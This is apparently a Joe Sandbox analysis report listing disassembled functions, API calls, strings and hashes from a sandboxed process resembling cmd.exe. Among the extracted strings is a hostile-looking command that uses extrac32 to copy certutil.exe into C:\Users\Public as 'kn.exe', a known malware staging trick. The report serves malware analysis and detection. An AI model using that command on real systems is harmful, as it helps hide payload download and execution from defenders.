                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 198002717-267741548
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d74fdd8ff02203c14ba5d1bbfd467f09d23cc99dc5c621ccfdda34cf655684ba
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7511D26B09A5B86F7506B51A81027DEB60FF49B80FD49177DA0F83675DFBCE0448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F000
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F031
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1595556998-2755026540
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1fa9ff3aa418b90ec13f43efebf1bfd85cbae4cc81189ebc0f0acdcb0df19bc0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40226C69E1965F81FB627B25A85027DF6A0BF05790FD24133D98F422B4DFBCE4898630
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: "$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3545743878-4143597401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f276ca3c5535b167d93cc3c824f89fd5c9954775a59f7686bac0abe3b277b8c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37C16166E0969BC1FB666B11940437DF6A1BF45B44FD68036EA4F023B4EFBCA485C630
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1535BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: aa1c03bcdc6e04166994d563dbbe0772ae59ccfb6cc76d7e62ef7c198236e975
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05617761A2964B85FB24EB51A4041ACE3A0FF45B88FD4513BDA0F03778CFBCE6418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15226E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateFile_open_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2905481843-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: baec084f93eb42b80639e28b01365cb2f932dcbdedb91a91eb075f84ef16130e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD71743660869A8AF7609F14E44027DFAA0FB45B61FD44236DA5F827B4DF7CD445CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15393E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3829876242-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3119724885e7d5fd92b57ed29d5b13f1e3860906e128097686eee21d63b36651
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80618F26A0964B86F754AB11941017EF6A0FFCAB94FC58136DA0F077A4DFBCE944CB60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1541A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 277a1ac477c7a5775c333b697b491c3f29c8014ee36902232a64355ce24a0823
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0611872608B8B8AEB619F21D8443E9B7A4FB45B85FD44136DA0E4B768DFBCD244C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15172B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7D1517279,?,?,?,?,?,00007FF7D151BFA9), ref: 00007FF7D1534485
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 322c5cfc7085a76491137e66a5cd7dbef5c550a58f217e12f15cbc0909c32713
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3C17E60E0C64B81F725BB1A55856BCA791AB56B84FE14037DD0F536B2CFBCE8868360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D151BA2B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF7D151BA8A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF7D151BAAA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2872855111-969133440
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 521aaf8e143ebafdc7f4e7ef76d3d33fafd5c86bf3ac3bf6b0cd795768a8e9e3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB17026A0D65B81FF61AB15A04427DB6A0FF48B84FD64236CA5F437B4DFBCA4818730
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606811317-2340392073
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e98332cc88dc11f885a006c329dccb44d4478da8f554192ffc8d1dff321dcd87
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7D19C26A19A4B81F711AB24A8542BDB6A0BF45B90FD44233EA5F437B4DFBCE445C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15403AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
